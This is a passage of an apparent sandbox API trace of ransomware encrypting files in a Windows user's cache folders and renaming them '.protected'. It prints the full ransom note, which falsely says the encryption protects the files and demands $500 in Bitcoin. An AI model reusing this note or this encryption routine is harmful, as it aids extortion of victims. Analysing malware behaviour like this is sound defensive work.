lpString2="RESTORE_FILES.txt") returned -1 [0088.919] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.919] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".rar") returned 0x0 [0088.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.920] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".zip") returned 0x0 [0088.920] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x226, lpOverlapped=0x0) returned 1 [0088.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x226, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x226, lpOverlapped=0x0) returned 1 [0088.921] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.921] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.921] CloseHandle (hObject=0x150) returned 1 [0088.921] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.protected") returned 128 [0088.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.protected")) returned 1 [0088.922] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0088.922] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0088.922] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt") returned 103 [0088.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0088.923] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0088.923] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0088.924] lstrlenA (lpString="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") returned 684 [0088.924] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0088.924] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0088.924] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0088.924] CloseHandle (hObject=0x14c) returned 1 [0088.925] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Windows") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Program Files") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="Program Files (x86)") returned -1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="$Recycle.bin") returned 1 [0088.925] lstrcmpiW (lpString1="MetaData", lpString2="System Volume Information") returned -1 [0088.925] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 86 [0088.925] lstrcmpW (lpString1="MetaData", lpString2=".") returned 1 [0088.925] lstrcmpW (lpString1="MetaData", lpString2="..") returned 1 [0088.925] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned 88 [0088.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0088.926] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0088.926] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.926] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.") returned 88 [0088.926] 
lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.926] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0088.926] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0088.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.926] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0088.926] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\..") returned 89 [0088.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.927] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0088.927] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0088.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.927] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Windows") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files (x86)") returned -1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="$Recycle.bin") returned 1 [0088.927] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="System Volume Information") returned -1 [0088.927] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.927] StrStrIW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".protected") returned 0x0 [0088.927] lstrcmpW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", 
lpString2="RESTORE_FILES.txt") returned -1 [0088.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".rar") returned 0x0 [0088.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0088.928] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".zip") returned 0x0 [0088.928] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.929] CloseHandle (hObject=0x150) returned 1 [0088.930] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected") returned 162 [0088.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.protected")) returned 1 [0088.931] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Windows") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files (x86)") returned -1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="$Recycle.bin") returned 1 [0088.931] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="System Volume Information") returned -1 [0088.931] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.931] StrStrIW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".protected") returned 0x0 [0088.931] lstrcmpW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="RESTORE_FILES.txt") returned -1 [0088.931] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.931] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".rar") returned 0x0 [0088.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0088.932] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".zip") returned 0x0 [0088.932] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x166, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.933] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x166, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x166, lpOverlapped=0x0) returned 1 [0088.933] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.933] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.934] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.934] CloseHandle (hObject=0x150) returned 1 [0088.934] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected") returned 162 [0088.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.protected")) returned 1 [0088.935] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Windows") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files (x86)") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="$Recycle.bin") returned 1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="System Volume Information") returned -1 [0088.935] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.935] StrStrIW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".protected") returned 0x0 [0088.935] lstrcmpW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="RESTORE_FILES.txt") returned -1 [0088.935] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.935] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.935] CreateFileW 